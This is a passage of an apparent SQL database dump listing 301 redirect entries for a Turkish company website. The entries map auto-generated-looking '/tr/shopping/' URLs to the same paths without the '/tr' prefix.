02:18:31','0000-00-00 00:00:00',301),(70330,'https://3s-technologies.com.tr/tr/shopping/canal/1901813726.html',NULL,'https://3s-technologies.com.tr/shopping/canal/1901813726.html','',1,0,'2026-06-11 02:18:34','0000-00-00 00:00:00',301),(70331,'https://3s-technologies.com.tr/tr/shopping/equicrure/3170875580.html',NULL,'https://3s-technologies.com.tr/shopping/equicrure/3170875580.html','',1,0,'2026-06-11 02:18:37','0000-00-00 00:00:00',301),(70332,'https://3s-technologies.com.tr/tr/shopping/opinion/1220369975.html',NULL,'https://3s-technologies.com.tr/shopping/opinion/1220369975.html','',1,0,'2026-06-11 02:18:40','0000-00-00 00:00:00',301),(70333,'https://3s-technologies.com.tr/tr/shopping/transumpt/3358955382.html',NULL,'https://3s-technologies.com.tr/shopping/transumpt/3358955382.html','',1,0,'2026-06-11 02:18:43','0000-00-00 00:00:00',301),(70334,'https://3s-technologies.com.tr/tr/shopping/thebaine/293983541.html',NULL,'https://3s-technologies.com.tr/shopping/thebaine/293983541.html','',1,0,'2026-06-11 02:18:46','0000-00-00 00:00:00',301),(70335,'https://3s-technologies.com.tr/tr/shopping/hardboiled/199141333.html',NULL,'https://3s-technologies.com.tr/shopping/hardboiled/199141333.html','',1,0,'2026-06-11 02:18:49','0000-00-00 00:00:00',301),(70336,'https://3s-technologies.com.tr/tr/shopping/viscum/2512620092.html',NULL,'https://3s-technologies.com.tr/shopping/viscum/2512620092.html','',1,0,'2026-06-11 02:18:54','0000-00-00 00:00:00',301),(70337,'https://3s-technologies.com.tr/tr/shopping/sophic/4044770954.html',NULL,'https://3s-technologies.com.tr/shopping/sophic/4044770954.html','',1,0,'2026-06-11 02:18:58','0000-00-00 00:00:00',301),(70338,'https://3s-technologies.com.tr/tr/shopping/diluviums/907148519.html',NULL,'https://3s-technologies.com.tr/shopping/diluviums/907148519.html','',1,0,'2026-06-11 02:19:01','0000-00-00 00:00:00',301),(70339,'https://3s-technologies.com.tr/tr/shopping/kansas/2435120463.html',NULL,'https://3s-technologies.com.tr/shopping/kansas/2435120463.html','',1,0,'2026-06-11 02:19:04','0000-00-00 00:00:00',301),(70340,'https://3s-technologies.com.tr/tr/shopping/cyclopteridae/730538527.html',NULL,'https://3s-technologies.com.tr/shopping/cyclopteridae/730538527.html','',1,0,'2026-06-11 02:19:07','0000-00-00 00:00:00',301),(70341,'https://3s-technologies.com.tr/tr/shopping/hyalograph/1754592464.html',NULL,'https://3s-technologies.com.tr/shopping/hyalograph/1754592464.html','',1,0,'2026-06-11 02:19:13','0000-00-00 00:00:00',301),(70342,'https://3s-technologies.com.tr/tr/shopping/ferrandine/142156407.html',NULL,'https://3s-technologies.com.tr/shopping/ferrandine/142156407.html','',1,0,'2026-06-11 02:19:17','0000-00-00 00:00:00',301),(70343,'https://3s-technologies.com.tr/tr/shopping/rappel/4279297334.html',NULL,'https://3s-technologies.com.tr/shopping/rappel/4279297334.html','',1,0,'2026-06-11 02:19:20','0000-00-00 00:00:00',301),(70344,'https://3s-technologies.com.tr/tr/shopping/soother/90369165.html',NULL,'https://3s-technologies.com.tr/shopping/soother/90369165.html','',1,0,'2026-06-11 02:19:23','0000-00-00 00:00:00',301),(70345,'https://3s-technologies.com.tr/tr/shopping/compartment/3895602053.html',NULL,'https://3s-technologies.com.tr/shopping/compartment/3895602053.html','',1,0,'2026-06-11 02:19:26','0000-00-00 00:00:00',301),(70346,'https://3s-technologies.com.tr/tr/shopping/severalty/1648004097.html',NULL,'https://3s-technologies.com.tr/shopping/severalty/1648004097.html','',1,0,'2026-06-11 02:19:32','0000-00-00 00:00:00',301),(70347,'https://3s-technologies.com.tr/tr/shopping/inhumanly/2787175188.html',NULL,'https://3s-technologies.com.tr/shopping/inhumanly/2787175188.html','',1,0,'2026-06-11 02:19:36','0000-00-00 00:00:00',301),(70348,'https://3s-technologies.com.tr/tr/shopping/vaisya/4188523680.html',NULL,'https://3s-technologies.com.tr/shopping/vaisya/4188523680.html','',1,0,'2026-06-11 02:19:39','0000-00-00 00:00:00',301),(70349,'https://3s-technologies.com.tr/tr/shopping/anointed/2912658966.html',NULL,'https://3s-technologies.com.tr/shopping/anointed/2912658966.html','',1,0,'2026-06-11 02:19:42','0000-00-00 00:00:00',301),(70350,'https://3s-technologies.com.tr/tr/shopping/klippspringer/2418991874.html',NULL,'https://3s-technologies.com.tr/shopping/klippspringer/2418991874.html','',1,0,'2026-06-11 02:19:45','0000-00-00 00:00:00',301),(70351,'https://3s-technologies.com.tr/tr/shopping/lamest/1951937401.html',NULL,'https://3s-technologies.com.tr/shopping/lamest/1951937401.html','',1,0,'2026-06-11 02:19:49','0000-00-00 00:00:00',301),(70352,'https://3s-technologies.com.tr/tr/shopping/dibasicity/1070207124.html',NULL,'https://3s-technologies.com.tr/shopping/dibasicity/1070207124.html','',1,0,'2026-06-11 02:19:52','0000-00-00 00:00:00',301),(70353,'https://3s-technologies.com.tr/tr/shopping/stole/3267060619.html',NULL,'https://3s-technologies.com.tr/shopping/stole/3267060619.html','',1,0,'2026-06-11 02:19:55','0000-00-00 00:00:00',301),(70354,'https://3s-technologies.com.tr/tr/shopping/exserviceman/4268890591.html',NULL,'https://3s-technologies.com.tr/shopping/exserviceman/4268890591.html','',1,0,'2026-06-11 02:19:57','0000-00-00 00:00:00',301),(70355,'https://3s-technologies.com.tr/tr/shopping/overstepping/3504655731.html',NULL,'https://3s-technologies.com.tr/shopping/overstepping/3504655731.html','',1,0,'2026-06-11 02:20:01','0000-00-00 00:00:00',301),(70356,'https://3s-technologies.com.tr/tr/shopping/restful/3593101288.html',NULL,'https://3s-technologies.com.tr/shopping/restful/3593101288.html','',1,0,'2026-06-11 02:20:09','0000-00-00 00:00:00',301),(70357,'https://3s-technologies.com.tr/tr/shopping/divulgate/3662752481.html',NULL,'https://3s-technologies.com.tr/shopping/divulgate/3662752481.html','',1,0,'2026-06-11 02:20:11','0000-00-00 00:00:00',301),(70358,'https://3s-technologies.com.tr/tr/shopping/manoe/2983522258.html',NULL,'https://3s-technologies.com.tr/shopping/manoe/2983522258.html','',1,0,'2026-06-11 02:20:14','0000-00-00 00:00:00',301),(70359,'https://3s-technologies.com.tr/tr/shopping/restorement/982908991.html',NULL,'https://3s-technologies.com.tr/shopping/restorement/982908991.html','',1,0,'2026-06-11 02:20:17','0000-00-00 00:00:00',301),(70360,'https://3s-technologies.com.tr/tr/shopping/undreamed/2911446867.html',NULL,'https://3s-technologies.com.tr/shopping/undreamed/2911446867.html','',1,0,'2026-06-11 02:20:20','0000-00-00 00:00:00',301),(70361,'https://3s-technologies.com.tr/tr/shopping/disastrous/1270428991.html',NULL,'https://3s-technologies.com.tr/shopping/disastrous/1270428991.html','',1,0,'2026-06-11 02:20:28','0000-00-00 00:00:00',301),(70362,'https://3s-technologies.com.tr/tr/shopping/omaha/1645579899.html',NULL,'https://3s-technologies.com.tr/shopping/omaha/1645579899.html','',1,0,'2026-06-11 02:20:30','0000-00-00 00:00:00',301),(70363,'https://3s-technologies.com.tr/tr/shopping/cerastium/2553652016.html',NULL,'https://3s-technologies.com.tr/shopping/cerastium/2553652016.html','',1,0,'2026-06-11 02:20:33','0000-00-00 00:00:00',301),(70364,'https://3s-technologies.com.tr/tr/shopping/overgird/2978769947.html',NULL,'https://3s-technologies.com.tr/shopping/overgird/2978769947.html','',1,0,'2026-06-11 02:20:36','0000-00-00 00:00:00',301),(70365,'https://3s-technologies.com.tr/tr/shopping/joulemeter/2219449950.html',NULL,'https://3s-technologies.com.tr/shopping/joulemeter/2219449950.html','',1,0,'2026-06-11 02:20:39','0000-00-00 00:00:00',301),(70366,'https://3s-technologies.com.tr/tr/shopping/pubens/1889352634.html',NULL,'https://3s-technologies.com.tr/shopping/pubens/1889352634.html','',1,0,'2026-06-11 02:21:19','0000-00-00 00:00:00',301),(70367,'https://3s-technologies.com.tr/tr/shopping/crupper/2224202245.html',NULL,'https://3s-technologies.com.tr/shopping/crupper/2224202245.html','',1,0,'2026-06-11 02:21:22','0000-00-00 00:00:00',301),(70368,'https://3s-technologies.com.tr/tr/shopping/pignon/2628119192.html',NULL,'https://3s-technologies.com.tr/shopping/pignon/2628119192.html','',1,0,'2026-06-11 02:21:25','0000-00-00 00:00:00',301),(70369,'https://3s-technologies.com.tr/tr/shopping/wakeful/642625387.html',NULL,'https://3s-technologies.com.tr/shopping/wakeful/642625387.html','',1,0,'2026-06-11 02:21:28','0000-00-00 00:00:00',301),(70370,'https://3s-technologies.com.tr/tr/shopping/spaceless/1127426636.html',NULL,'https://3s-technologies.com.tr/shopping/spaceless/1127426636.html','',1,0,'2026-06-11 02:21:31','0000-00-00 00:00:00',301),(70371,'https://3s-technologies.com.tr/tr/shopping/sunnite/1471150617.html',NULL,'https://3s-technologies.com.tr/shopping/sunnite/1471150617.html','',1,0,'2026-06-11 02:21:51','0000-00-00 00:00:00',301),(70372,'https://3s-technologies.com.tr/tr/shopping/papaer/3933245224.html',NULL,'https://3s-technologies.com.tr/shopping/papaer/3933245224.html','',1,0,'2026-06-11 02:21:53','0000-00-00 00:00:00',301),(70373,'https://3s-technologies.com.tr/tr/shopping/juncate/4054027045.html',NULL,'https://3s-technologies.com.tr/shopping/juncate/4054027045.html','',1,0,'2026-06-11 02:21:56','0000-00-00 00:00:00',301),(70374,'https://3s-technologies.com.tr/tr/shopping/fraternal/2195343701.html',NULL,'https://3s-technologies.com.tr/shopping/fraternal/2195343701.html','',1,0,'2026-06-11 02:21:59','0000-00-00 00:00:00',301),(70375,'https://3s-technologies.com.tr/tr/shopping/wishfully/1126050998.html',NULL,'https://3s-technologies.com.tr/shopping/wishfully/1126050998.html','',1,0,'2026-06-11 02:22:02','0000-00-00 00:00:00',301),(70376,'https://3s-technologies.com.tr/tr/shopping/allout/2774358568.html',NULL,'https://3s-technologies.com.tr/shopping/allout/2774358568.html','',1,0,'2026-06-11 02:22:18','0000-00-00 00:00:00',301),(70377,'https://3s-technologies.com.tr/tr/shopping/nitroglycerine/1919702168.html',NULL,'https://3s-technologies.com.tr/shopping/nitroglycerine/1919702168.html','',1,0,'2026-06-11 02:22:20','0000-00-00 00:00:00',301),(70378,'https://3s-technologies.com.tr/tr/shopping/tastable/504628164.html',NULL,'https://3s-technologies.com.tr/shopping/tastable/504628164.html','',1,0,'2026-06-11 02:22:23','0000-00-00 00:00:00',301),(70379,'https://3s-technologies.com.tr/tr/shopping/encoubert/1257170944.html',NULL,'https://3s-technologies.com.tr/shopping/encoubert/1257170944.html','',1,0,'2026-06-11 02:22:26','0000-00-00 00:00:00',301),(70380,'https://3s-technologies.com.tr/tr/shopping/auradin/140944308.html',NULL,'https://3s-technologies.com.tr/shopping/auradin/140944308.html','',1,0,'2026-06-11 02:22:29','0000-00-00 00:00:00',301),(70381,'https://3s-technologies.com.tr/tr/shopping/dipper/2782864320.html',NULL,'https://3s-technologies.com.tr/shopping/dipper/2782864320.html','',1,0,'2026-06-11 02:22:40','0000-00-00 00:00:00',301),(70382,'https://3s-technologies.com.tr/tr/shopping/falsehood/897114859.html',NULL,'https://3s-technologies.com.tr/shopping/falsehood/897114859.html','',1,0,'2026-06-11 02:22:42','0000-00-00 00:00:00',301),(70383,'https://3s-technologies.com.tr/tr/shopping/uptodate/1105319255.html',NULL,'https://3s-technologies.com.tr/shopping/uptodate/1105319255.html','',1,0,'2026-06-11 02:22:45','0000-00-00 00:00:00',301),(70384,'https://3s-technologies.com.tr/tr/shopping/maniable/2959857452.html',NULL,'https://3s-technologies.com.tr/shopping/maniable/2959857452.html','',1,0,'2026-06-11 02:22:48','0000-00-00 00:00:00',301),(70385,'https://3s-technologies.com.tr/tr/shopping/summarist/2397554134.html',NULL,'https://3s-technologies.com.tr/shopping/summarist/2397554134.html','',1,0,'2026-06-11 02:22:51','0000-00-00 00:00:00',301),(70386,'https://3s-technologies.com.tr/tr/shopping/maneh/1208974575.html',NULL,'https://3s-technologies.com.tr/shopping/maneh/1208974575.html','',1,0,'2026-06-11 02:23:01','0000-00-00 00:00:00',301),(70387,'https://3s-technologies.com.tr/tr/shopping/coach/1214938969.html',NULL,'https://3s-technologies.com.tr/shopping/coach/1214938969.html','',1,0,'2026-06-11 02:23:03','0000-00-00 00:00:00',301),(70388,'https://3s-technologies.com.tr/tr/shopping/deedy/534093873.html',NULL,'https://3s-technologies.com.tr/shopping/deedy/534093873.html','',1,0,'2026-06-11 02:23:06','0000-00-00 00:00:00',301),(70389,'https://3s-technologies.com.tr/tr/shopping/belly/1460760958.html',NULL,'https://3s-technologies.com.tr/shopping/belly/1460760958.html','',1,0,'2026-06-11 02:23:10','0000-00-00 00:00:00',301),(70390,'https://3s-technologies.com.tr/tr/shopping/surmised/956884662.html',NULL,'https://3s-technologies.com.tr/shopping/surmised/956884662.html','',1,0,'2026-06-11 02:23:12','0000-00-00 00:00:00',301),(70391,'https://3s-technologies.com.tr/tr/shopping/alkalis/1978026405.html',NULL,'https://3s-technologies.com.tr/shopping/alkalis/1978026405.html','',1,0,'2026-06-11 02:23:31','0000-00-00 00:00:00',301),(70392,'https://3s-technologies.com.tr/tr/shopping/thlipsis/4287803086.html',NULL,'https://3s-technologies.com.tr/shopping/thlipsis/4287803086.html','',1,0,'2026-06-11 02:23:33','0000-00-00 00:00:00',301),(70393,'https://3s-technologies.com.tr/tr/shopping/tinge/2533430350.html',NULL,'https://3s-technologies.com.tr/shopping/tinge/2533430350.html','',1,0,'2026-06-11 02:23:36','0000-00-00 00:00:00',301),(70394,'https://3s-technologies.com.tr/tr/shopping/prewarned/1366070324.html',NULL,'https://3s-technologies.com.tr/shopping/prewarned/1366070324.html','',1,0,'2026-06-11 02:23:39','0000-00-00 00:00:00',301),(70395,'https://3s-technologies.com.tr/tr/shopping/sameness/3801961787.html',NULL,'https://3s-technologies.com.tr/shopping/sameness/3801961787.html','',1,0,'2026-06-11 02:23:42','0000-00-00 00:00:00',301),(70396,'https://3s-technologies.com.tr/tr/shopping/thickskull/1528755846.html',NULL,'https://3s-technologies.com.tr/shopping/thickskull/1528755846.html','',1,0,'2026-06-11 02:23:55','0000-00-00 00:00:00',301),(70397,'https://3s-technologies.com.tr/tr/shopping/amarga/539969292.html',NULL,'https://3s-technologies.com.tr/shopping/amarga/539969292.html','',1,0,'2026-06-11 02:23:59','0000-00-00 00:00:00',301),(70398,'https://3s-technologies.com.tr/tr/shopping/battling/3832032430.html',NULL,'https://3s-technologies.com.tr/shopping/battling/3832032430.html','',1,0,'2026-06-11 02:24:03','0000-00-00 00:00:00',301),(70399,'https://3s-technologies.com.tr/tr/shopping/praefloration/962013725.html',NULL,'https://3s-technologies.com.tr/shopping/praefloration/962013725.html','',1,0,'2026-06-11 02:24:06','0000-00-00 00:00:00',301),(70400,'https://3s-technologies.com.tr/tr/shopping/poult/1802788833.html',NULL,'https://3s-technologies.com.tr/shopping/poult/1802788833.html','',1,0,'2026-06-11 02:24:09','0000-00-00 00:00:00',301),(70401,'https://3s-technologies.com.tr/tr/shopping/quantic/1618603079.html',NULL,'https://3s-technologies.com.tr/shopping/quantic/1618603079.html','',1,0,'2026-06-11 02:24:15','0000-00-00 00:00:00',301),(70402,'https://3s-technologies.com.tr/tr/shopping/sleeked/1182834894.html',NULL,'https://3s-technologies.com.tr/shopping/sleeked/1182834894.html','',1,0,'2026-06-11 02:24:18','0000-00-00 00:00:00',301),(70403,'https://3s-technologies.com.tr/tr/shopping/tradeless/3282596409.html',NULL,'https://3s-technologies.com.tr/shopping/tradeless/3282596409.html','',1,0,'2026-06-11 02:24:21','0000-00-00 00:00:00',301),(70404,'https://3s-technologies.com.tr/tr/shopping/circumventive/556604028.html',NULL,'https://3s-technologies.com.tr/shopping/circumventive/556604028.html','',1,0,'2026-06-11 02:24:24','0000-00-00 00:00:00',301),(70405,'https://3s-technologies.com.tr/tr/shopping/longilateral/213246926.html',NULL,'https://3s-technologies.com.tr/shopping/longilateral/213246926.html','',1,0,'2026-06-11 02:24:27','0000-00-00 00:00:00',301),(70406,'https://3s-technologies.com.tr/tr/shopping/millenarism/1757016646.html',NULL,'https://3s-technologies.com.tr/shopping/millenarism/1757016646.html','',1,0,'2026-06-11 02:24:45','0000-00-00 00:00:00',301),(70407,'https://3s-technologies.com.tr/tr/shopping/parados/3910974352.html',NULL,'https://3s-technologies.com.tr/shopping/parados/3910974352.html','',1,0,'2026-06-11 02:24:47','0000-00-00 00:00:00',301),(70408,'https://3s-technologies.com.tr/tr/shopping/tortious/2547473406.html',NULL,'https://3s-technologies.com.tr/shopping/tortious/2547473406.html','',1,0,'2026-06-11 02:24:50','0000-00-00 00:00:00',301),(70409,'https://3s-technologies.com.tr/tr/shopping/blolly/2915100248.html',NULL,'https://3s-technologies.com.tr/shopping/blolly/2915100248.html','',1,0,'2026-06-11 02:24:53','0000-00-00 00:00:00',301),(70410,'https://3s-technologies.com.tr/tr/shopping/creme/3062249980.html',NULL,'https://3s-technologies.com.tr/shopping/creme/3062249980.html','',1,0,'2026-06-11 02:24:56','0000-00-00 00:00:00',301),(70411,'https://3s-technologies.com.tr/tr/shopping/internodial/265885644.html',NULL,'https://3s-technologies.com.tr/shopping/internodial/265885644.html','',1,0,'2026-06-11 02:25:03','0000-00-00 00:00:00',301),(70412,'https://3s-technologies.com.tr/tr/shopping/omnipresent/3632402931.html',NULL,'https://3s-technologies.com.tr/shopping/omnipresent/3632402931.html','',1,0,'2026-06-11 02:25:04','0000-00-00 00:00:00',301),(70413,'https://3s-technologies.com.tr/tr/shopping/clodpole/49628180.html',NULL,'https://3s-technologies.com.tr/shopping/clodpole/49628180.html','',1,0,'2026-06-11 02:25:07','0000-00-00 00:00:00',301),(70414,'https://3s-technologies.com.tr/tr/shopping/marlinespike/2381247656.html',NULL,'https://3s-technologies.com.tr/shopping/marlinespike/2381247656.html','',1,0,'2026-06-11 02:25:10','0000-00-00 00:00:00',301),(70415,'https://3s-technologies.com.tr/tr/shopping/algonkian/3935409814.html',NULL,'https://3s-technologies.com.tr/shopping/algonkian/3935409814.html','',1,0,'2026-06-11 02:25:13','0000-00-00 00:00:00',301),(70416,'https://3s-technologies.com.tr/tr/shopping/bishoped/1117545278.html',NULL,'https://3s-technologies.com.tr/shopping/bishoped/1117545278.html','',1,0,'2026-06-11 02:25:40','0000-00-00 00:00:00',301),(70417,'https://3s-technologies.com.tr/tr/shopping/politer/2974181143.html',NULL,'https://3s-technologies.com.tr/shopping/politer/2974181143.html','',1,0,'2026-06-11 02:25:42','0000-00-00 00:00:00',301),(70418,'https://3s-technologies.com.tr/tr/shopping/thermojunction/608635597.html',NULL,'https://3s-technologies.com.tr/shopping/thermojunction/608635597.html','',1,0,'2026-06-11 02:25:45','0000-00-00 00:00:00',301),(70419,'https://3s-technologies.com.tr/tr/shopping/oatmeal/210822712.html',NULL,'https://3s-technologies.com.tr/shopping/oatmeal/210822712.html','',1,0,'2026-06-11 02:25:48','0000-00-00 00:00:00',301),(70420,'https://3s-technologies.com.tr/tr/shopping/proximad/86828937.html',NULL,'https://3s-technologies.com.tr/shopping/proximad/86828937.html','',1,0,'2026-06-11 02:25:51','0000-00-00 00:00:00',301),(70421,'https://3s-technologies.com.tr/tr/shopping/chemotactic/708619208.html',NULL,'https://3s-technologies.com.tr/shopping/chemotactic/708619208.html','',1,0,'2026-06-11 02:25:56','0000-00-00 00:00:00',301),(70422,'https://3s-technologies.com.tr/tr/shopping/rubythroat/2457470392.html',NULL,'https://3s-technologies.com.tr/shopping/rubythroat/2457470392.html','',1,0,'2026-06-11 02:25:58','0000-00-00 00:00:00',301),(70423,'https://3s-technologies.com.tr/tr/shopping/personalism/412642411.html',NULL,'https://3s-technologies.com.tr/shopping/personalism/412642411.html','',1,0,'2026-06-11 02:26:01','0000-00-00 00:00:00',301),(70424,'https://3s-technologies.com.tr/tr/shopping/glutted/2203585886.html',NULL,'https://3s-technologies.com.tr/shopping/glutted/2203585886.html','',1,0,'2026-06-11 02:26:04','0000-00-00 00:00:00',301),(70425,'https://3s-technologies.com.tr/tr/shopping/curacy/735660719.html',NULL,'https://3s-technologies.com.tr/shopping/curacy/735660719.html','',1,0,'2026-06-11 02:26:07','0000-00-00 00:00:00',301),(70426,'https://3s-technologies.com.tr/tr/shopping/jewelsofopar/3294543525.html',NULL,'https://3s-technologies.com.tr/shopping/jewelsofopar/3294543525.html','',1,0,'2026-06-11 02:26:12','0000-00-00 00:00:00',301),(70427,'https://3s-technologies.com.tr/tr/shopping/delate/3449328261.html',NULL,'https://3s-technologies.com.tr/shopping/delate/3449328261.html','',1,0,'2026-06-11 02:26:14','0000-00-00 00:00:00',301),(70428,'https://3s-technologies.com.tr/tr/shopping/sextonship/2885176060.html',NULL,'https://3s-technologies.com.tr/shopping/sextonship/2885176060.html','',1,0,'2026-06-11 02:26:17','0000-00-00 00:00:00',301),(70429,'https://3s-technologies.com.tr/tr/shopping/voice/1863049430.html',NULL,'https://3s-technologies.com.tr/shopping/voice/1863049430.html','',1,0,'2026-06-11 02:26:20','0000-00-00 00:00:00',301),(70430,'https://3s-technologies.com.tr/tr/shopping/parella/3867251403.html',NULL,'https://3s-technologies.com.tr/shopping/parella/3867251403.html','',1,0,'2026-06-11 02:26:23','0000-00-00 00:00:00',301),(70431,'https://3s-technologies.com.tr/tr/shopping/corticose/3677059104.html',NULL,'https://3s-technologies.com.tr/shopping/corticose/3677059104.html','',1,0,'2026-06-11 02:26:34','0000-00-00 00:00:00',301),(70432,'https://3s-technologies.com.tr/tr/shopping/furcation/1816228699.html',NULL,'https://3s-technologies.com.tr/shopping/furcation/1816228699.html','',1,0,'2026-06-11 02:26:38','0000-00-00 00:00:00',301),(70433,'https://3s-technologies.com.tr/tr/shopping/preconceiving/2452881604.html',NULL,'https://3s-technologies.com.tr/shopping/preconceiving/2452881604.html','',1,0,'2026-06-11 02:26:41','0000-00-00 00:00:00',301),(70434,'https://3s-technologies.com.tr/tr/shopping/committee/493074013.html',NULL,'https://3s-technologies.com.tr/shopping/committee/493074013.html','',1,0,'2026-06-11 02:26:44','0000-00-00 00:00:00',301),(70435,'https://3s-technologies.com.tr/tr/shopping/cabiritic/3097058904.html',NULL,'https://3s-technologies.com.tr/shopping/cabiritic/3097058904.html','',1,0,'2026-06-11 02:26:47','0000-00-00 00:00:00',301),(70436,'https://3s-technologies.com.tr/tr/shopping/headway/4228772852.html',NULL,'https://3s-technologies.com.tr/shopping/headway/4228772852.html','',1,0,'2026-06-11 02:26:52','0000-00-00 00:00:00',301),(70437,'https://3s-technologies.com.tr/tr/shopping/smouch/2715314029.html',NULL,'https://3s-technologies.com.tr/shopping/smouch/2715314029.html','',1,0,'2026-06-11 02:26:54','0000-00-00 00:00:00',301),(70438,'https://3s-technologies.com.tr/tr/shopping/dowle/1960443153.html',NULL,'https://3s-technologies.com.tr/shopping/dowle/1960443153.html','',1,0,'2026-06-11 02:26:57','0000-00-00 00:00:00',301),(70439,'https://3s-technologies.com.tr/tr/shopping/unessential/2910494376.html',NULL,'https://3s-technologies.com.tr/shopping/unessential/2910494376.html','',1,0,'2026-06-11 02:27:00','0000-00-00 00:00:00',301),(70440,'https://3s-technologies.com.tr/tr/shopping/partisan/2028024119.html',NULL,'https://3s-technologies.com.tr/shopping/partisan/2028024119.html','',1,0,'2026-06-11 02:27:05','0000-00-00 00:00:00',301),(70441,'https://3s-technologies.com.tr/tr/shopping/sixthly/307754342.html',NULL,'https://3s-technologies.com.tr/shopping/sixthly/307754342.html','',1,0,'2026-06-11 02:27:10','0000-00-00 00:00:00',301),(70442,'https://3s-technologies.com.tr/tr/shopping/forceless/4019045211.html',NULL,'https://3s-technologies.com.tr/shopping/forceless/4019045211.html','',1,0,'2026-06-11 02:27:13','0000-00-00 00:00:00',301),(70443,'https://3s-technologies.com.tr/tr/shopping/surfy/1541627770.html',NULL,'https://3s-technologies.com.tr/shopping/surfy/1541627770.html','',1,0,'2026-06-11 02:27:16','0000-00-00 00:00:00',301),(70444,'https://3s-technologies.com.tr/tr/shopping/systeme/2401565477.html',NULL,'https://3s-technologies.com.tr/shopping/systeme/2401565477.html','',1,0,'2026-06-11 02:27:19','0000-00-00 00:00:00',301),(70445,'https://3s-technologies.com.tr/tr/shopping/decompounded/3846450516.html',NULL,'https://3s-technologies.com.tr/shopping/decompounded/3846450516.html','',1,0,'2026-06-11 02:27:22','0000-00-00 00:00:00',301),(70446,'https://3s-technologies.com.tr/tr/shopping/leafcup/741489095.html',NULL,'https://3s-technologies.com.tr/shopping/leafcup/741489095.html','',1,0,'2026-06-11 02:27:25','0000-00-00 00:00:00',301),(70447,'https://3s-technologies.com.tr/tr/shopping/selftrust/548732946.html',NULL,'https://3s-technologies.com.tr/shopping/selftrust/548732946.html','',1,0,'2026-06-11 02:27:28','0000-00-00 00:00:00',301),(70448,'https://3s-technologies.com.tr/tr/shopping/pottering/4239960720.html',NULL,'https://3s-technologies.com.tr/shopping/pottering/4239960720.html','',1,0,'2026-06-11 02:27:31','0000-00-00 00:00:00',301),(70449,'https://3s-technologies.com.tr/tr/shopping/materialize/1580356409.html',NULL,'https://3s-technologies.com.tr/shopping/materialize/1580356409.html','',1,0,'2026-06-11 02:27:34','0000-00-00 00:00:00',301),(70450,'https://3s-technologies.com.tr/tr/shopping/coxcombically/3499325975.html',NULL,'https://3s-technologies.com.tr/shopping/coxcombically/3499325975.html','',1,0,'2026-06-11 02:27:37','0000-00-00 00:00:00',301),(70451,'https://3s-technologies.com.tr/tr/shopping/chowder/1407724838.html',NULL,'https://3s-technologies.com.tr/shopping/chowder/1407724838.html','',1,0,'2026-06-11 02:27:40','0000-00-00 00:00:00',301),(70452,'https://3s-technologies.com.tr/tr/shopping/usable/3472070280.html',NULL,'https://3s-technologies.com.tr/shopping/usable/3472070280.html','',1,0,'2026-06-11 02:27:43','0000-00-00 00:00:00',301),(70453,'https://3s-technologies.com.tr/tr/shopping/forthrightness/964532318.html',NULL,'https://3s-technologies.com.tr/shopping/forthrightness/964532318.html','',1,0,'2026-06-11 02:27:46','0000-00-00 00:00:00',301),(70454,'https://3s-technologies.com.tr/tr/shopping/challenge/3565664167.html',NULL,'https://3s-technologies.com.tr/shopping/challenge/3565664167.html','',1,0,'2026-06-11 02:27:49','0000-00-00 00:00:00',301),(70455,'https://3s-technologies.com.tr/tr/shopping/secularity/4226637982.html',NULL,'https://3s-technologies.com.tr/shopping/secularity/4226637982.html','',1,0,'2026-06-11 02:27:52','0000-00-00 00:00:00',301),(70456,'https://3s-technologies.com.tr/tr/shopping/straining/3690524715.html',NULL,'https://3s-technologies.com.tr/shopping/straining/3690524715.html','',1,0,'2026-06-11 02:27:55','0000-00-00 00:00:00',301),(70457,'https://3s-technologies.com.tr/tr/shopping/sequaciousness/788309858.html',NULL,'https://3s-technologies.com.tr/shopping/sequaciousness/788309858.html','',1,0,'2026-06-11 02:27:58','0000-00-00 00:00:00',301),(70458,'https://3s-technologies.com.tr/tr/shopping/appalling/1686528432.html',NULL,'https://3s-technologies.com.tr/shopping/appalling/1686528432.html','',1,0,'2026-06-11 02:28:01','0000-00-00 00:00:00',301),(70459,'https://3s-technologies.com.tr/tr/shopping/despiteous/953979120.html',NULL,'https://3s-technologies.com.tr/shopping/despiteous/953979120.html','',1,0,'2026-06-11 02:28:04','0000-00-00 00:00:00',301),(70460,'https://3s-technologies.com.tr/tr/shopping/deviless/1727807900.html',NULL,'https://3s-technologies.com.tr/shopping/deviless/1727807900.html','',1,0,'2026-06-11 02:28:07','0000-00-00 00:00:00',301),(70461,'https://3s-technologies.com.tr/tr/shopping/stoping/27991946.html',NULL,'https://3s-technologies.com.tr/shopping/stoping/27991946.html','',1,0,'2026-06-11 02:28:10','0000-00-00 00:00:00',301),(70462,'https://3s-technologies.com.tr/tr/shopping/correctify/266356759.html',NULL,'https://3s-technologies.com.tr/shopping/correctify/266356759.html','',1,0,'2026-06-11 02:28:13','0000-00-00 00:00:00',301),(70463,'https://3s-technologies.com.tr/tr/shopping/holderforth/245020082.html',NULL,'https://3s-technologies.com.tr/shopping/holderforth/245020082.html','',1,0,'2026-06-11 02:28:16','0000-00-00 00:00:00',301),(70464,'https://3s-technologies.com.tr/tr/shopping/insociate/528764101.html',NULL,'https://3s-technologies.com.tr/shopping/insociate/528764101.html','',1,0,'2026-06-11 02:28:19','0000-00-00 00:00:00',301),(70465,'https://3s-technologies.com.tr/tr/shopping/cotqueanity/2214955541.html',NULL,'https://3s-technologies.com.tr/shopping/cotqueanity/2214955541.html','',1,0,'2026-06-11 02:28:22','0000-00-00 00:00:00',301),(70466,'https://3s-technologies.com.tr/tr/shopping/predictable/4127425011.html',NULL,'https://3s-technologies.com.tr/shopping/predictable/4127425011.html','',1,0,'2026-06-11 02:28:25','0000-00-00 00:00:00',301),(70467,'https://3s-technologies.com.tr/tr/shopping/misdevotion/546145209.html',NULL,'https://3s-technologies.com.tr/shopping/misdevotion/546145209.html','',1,0,'2026-06-11 02:28:28','0000-00-00 00:00:00',301),(70468,'https://3s-technologies.com.tr/tr/shopping/surcle/3216440187.html',NULL,'https://3s-technologies.com.tr/shopping/surcle/3216440187.html','',1,0,'2026-06-11 02:28:35','0000-00-00 00:00:00',301),(70469,'https://3s-technologies.com.tr/tr/shopping/worryingly/2732282960.html',NULL,'https://3s-technologies.com.tr/shopping/worryingly/2732282960.html','',1,0,'2026-06-11 02:28:37','0000-00-00 00:00:00',301),(70470,'https://3s-technologies.com.tr/tr/shopping/enterpriser/2018519497.html',NULL,'https://3s-technologies.com.tr/shopping/enterpriser/2018519497.html','',1,0,'2026-06-11 02:28:40','0000-00-00 00:00:00',301),(70471,'https://3s-technologies.com.tr/tr/shopping/bedspread/701384850.html',NULL,'https://3s-technologies.com.tr/shopping/bedspread/701384850.html','',1,0,'2026-06-11 